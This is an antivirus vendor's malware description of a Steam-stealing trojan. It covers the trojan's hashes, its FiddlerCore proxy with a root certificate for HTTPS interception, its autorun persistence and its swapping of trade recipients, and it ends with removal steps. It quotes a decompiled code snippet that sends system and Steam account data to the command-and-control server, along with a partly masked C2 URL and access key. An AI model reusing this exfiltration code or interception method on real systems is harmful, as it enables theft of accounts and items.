Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Trojan.PWS.Steam.15278

Added to the Dr.Web virus database: 2017-12-19

Virus description added:

SHA1

  • 2891c6502586de470cad2108c4367ef23b375ff7
  • 3de7719afc981ee96b97300a4cd18b9365c771bf

A Trojan designed to steal collectibles from Steam users. It uses Fiddler to intercept server responses and replace the data in them. Fiddler is installed as a proxy on the infected computer. It will use the port indicated in the Trojan’s configuration (in the examined examples, this is port 8333). Fiddler also installs a root certificate in the system; this allows it to intercept encrypted HTTPS traffic.

Using the Windows system registry, it determines the path to the Steam directory, the operating system’s language settings, and the username from the AutoLoginUser field. In the Steam folder, the Trojan checks whether the file \config\loginusers.vdf is present: if it is, the malicious program parses it and extracts pairs resembling “account name<=> steamid64”.

The Trojan sends the collected information to the command and control server (this data is collected in 30-minute intervals):

NameValueCollection nameValueCollection = new NameValueCollection();
nameValueCollection.Add("type", "s");
nameValueCollection.Add("keyAccess", "809af20434864b142664613a8e42ff78");
nameValueCollection.Add("systemOS", value);
nameValueCollection.Add("systemUser", userName);
nameValueCollection.Add("systemMachine", machineName);
nameValueCollection.Add("languageOS", englishName);
nameValueCollection.Add("steamids", value2);
nameValueCollection.Add("steamPath", Class0.string_4);
nameValueCollection.Add("steamLang", Class0.string_6);
nameValueCollection.Add("steamRememberL", Class0.string_5);
nameValueCollection.Add("online", online.ToString());
Class0.POSTWithFakerHeader(Class0.soft2_req, nameValueCollection);

It saves the following files to its own folder:

  • Windows Host.exe—the Trojan’s body;
  • settings.conf—Fiddler’s configuration;
  • FiddlerCore.dll—Fiddler’s library with a valid digital signature;
  • BCMakeCert.dll—a library with an open source code BouncyCastle.Crypto;
  • CertMaker.dll—the ICertificateProvider plugin for FiddlerCore.

It modifies the system registry branch [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] to ensure its own auto start. The Trojan’s resources have one more executable file—Proxy.Resources.Cleaner.exe. It is used to launch and then shut down Fiddler.

It installs its handler for the OnBeforeResponse function of Fiddler’s library, which allows server responses to be changed into network requests. The handler ignores requests if their URL has the following values: “.bmp”, “.jpg”, “.jpeg”, “.js”, “.png”, “.ico”, “.svg”, “.pdf” and “localhost”. If the configuration of the malicious program has a special flag and a user visits one of the following websites: opskins.com, igxe.cn, bitskins.com, g2a.com, csgo.tm, market.csgo.com, market.dota2.net, tf2.tm, the webpage code is integrated with the malicious script downloaded from the command and control server. It replaces the collectibles recipient when exchanges are made on the specified websites.

If the Trojan’s configuration has the corresponding flag and the user of the infected computer visits the website steamcommunity.com, the Trojan sends the following POST request to the command and control server:

https://f****.pro/soft2/base.php?l=bG9ta2F0b3A%3D&k=809af20434864b142664613a8e42ff78&ek=cba2c8e810c06a917f95f6f424fbffa0

The request sends the data {"type": "r", "keyAccess": "809af20434864b142664613a8e42ff78"}, and the HTTP request gets the parameter “faker”: “gl”. In the received response, the symbols '\xD1\x96’ are replaced with 'i', ‘\xD1\x81’—with ‘c’, and '(' with ‘=’, after which the response is decoded using base64. The decrypted data represents the Trojan’s configuration, which contains the steamid of the user whose inventory is to be replaced, and also the parameters of the collectibles to be used for the replacement.

If the content type in an HTPP request is indicated as HTML, the URL contains the values “steamcommunity.com”, “/tradeoffer”, and the connection uses the HTTP protocol, the Trojan replaces the server’s response with error code 302 and switches the connection to the HTTPS protocol.

If the content type in the HTTP request is indicated as JSON, and the URL contains the values “steamcommunity.com/profiles/7656”, “/inventory/json/” or “steamcommunity.com/tradeoffer”, “partnerinventory” , “partner=”, “appid=”, extracts steamid of the partner and checks whether any steamid parameters are in the data received from the server. If not, it doesn’t do anything.

Then the Trojan extracts the steamid64 value of the exchange partner from the URL and checks whether the data obtained from the command and control server contains the parameters for steamid64. It reads the “Cookie” parameter of the HTTP header and checks the installed language in the parameter “Steam_Language”. If Russian is indicated as the “Steam_Language”, the Trojan will display messages in Russian; in all other cases—in English.

If the values jobject2["rgDescriptions"][jproperty.Name]["market_hash_name”] of the collectibles coincide with those indicated in the key for the server data sent for this steamid, the fields “market_hash_name”, “market_name”, “name”, “name_color”, “icon_url”, “icon_url_large”, “description”->“value” are replaced in rgDescription. They are replaced with data received from the command and control server. The field “classid” is not replaced.

If the content type in the HTTP request is indicated as JSON and the URL contains the values “steamcommunity.com/inventory/”, the Trojan extracts the steamid64 value from the URL and checks whether the data obtained from the command and control server contains the parameters for steamid64. It reads the “Cookie” parameter of the HTTP header and verifies what language is installed in the parameter “Steam_Language”. If Russian is indicated as the “Steam_Language”, the Trojan will display messages in Russian; in all other cases—in English. Then for the collectibles whose values jobject2["rgDescriptions"][jproperty.Name]["market_hash_name”] coincide with those indicated in the “name” field in the steamid data received from the command and control server, the fields are replaced with the values received from the command and control server.

If the content type in the HTTP request is indicated as HTML and the URL contains the values “steamcommunity.com/economy/itemclasshover/” and “content_only=1”, the Trojan parses the page and determines the steamid. Then it attempts to replace the characteristics of the collectibles according to the data it obtained from the command and control server.

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android